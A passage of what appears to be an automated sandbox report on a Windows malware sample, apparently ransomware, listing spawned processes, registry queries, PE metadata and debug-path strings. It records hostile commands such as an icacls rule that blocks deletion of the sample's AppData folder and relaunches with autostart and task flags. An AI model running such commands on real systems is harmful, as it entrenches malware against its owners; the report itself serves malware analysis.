Constraintsid-ppl-independentIndependentRSA-SHA256sha256WithRSAEncryptionRSA-SHA384sha384WithRSAEncryptionRSA-SHA512sha512WithRSAEncryptionRSA-SHA224sha224WithRSAEncryptionSHA256sha256SHA384sha384SHA512sha512SHA224sha224identified-organizationcerticom-arcwapwap-wsgid-characteristic-two-basisonBasistpBasisppBasisc2pnb163v1c2pnb163v2c2pnb163v3c2pnb176v1c2tnb191v1c2tnb191v2c2tnb191v3c2onb191v4c2onb191v5c2pnb208w1c2tnb239v1c2tnb239v2c2tnb239v3c2onb239v4c2onb239v5c2pnb272w1c2pnb304w1c2tnb359v1c2pnb368w1c2tnb431r1secp112r1secp112r2*
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeString found in binary or memory: id-cmc-addExtensions
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile read: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: unknownProcess created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe --Task
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                Source: unknownProcess created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeProcess created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic file information: File size 1150976 > 1048576
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310270639.0000000003B32000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341825344.0000000003C86000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273490567.0000000003C47000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315115698.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2254663516.0000000003C5D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310618606.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332695677.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad589
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\n source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233541682.000000000369B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324270878.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2329014572.0000000003F0B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274901579.00000000036F6000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273955613.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2275561361.00000000036F7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292702111.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294571563.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284499187.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274054462.00000000036EE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\X source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323202530.0000000003FE5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320363197.0000000003FE4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324709500.0000000004014000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323554305.000000000400D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\R source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255826766.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255723793.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\p source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293986477.0000000003B27000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295241780.0000000003B2F000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292390530.0000000003B09000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2333358310.000000000407D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2358481329.0000000003F52000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341385936.0000000003F42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\l` source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284034690.0000000003EA3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284499187.0000000003EBB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\b source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2351367972.0000000003C9A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2340729338.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2337425529.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292648224.0000000003C65000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292043905.0000000003C56000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2325051592.000000000403C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332101728.0000000003EB3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\VO source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232512939.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274642389.00000000036C8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2275873196.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2232315956.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233489520.00000000036AF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233363954.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255723793.00000000036C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\)> source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233541682.000000000369B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044311129.000000000369A000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044529317.00000000036A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324270878.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2329014572.0000000003F0B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323202530.0000000003FE5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320363197.0000000003FE4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324709500.0000000004014000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323554305.000000000400D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\on\X source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2274642389.00000000036C8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2275873196.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233489520.00000000036AF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233363954.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2255723793.00000000036C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\_ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2309862085.0000000003F03000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\&z source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2292447274.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294330417.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2285134073.0000000003BC5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294035823.0000000003BC8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282369419.0000000003BB9000.00000004.00000020.00020000.00000000.sdmp
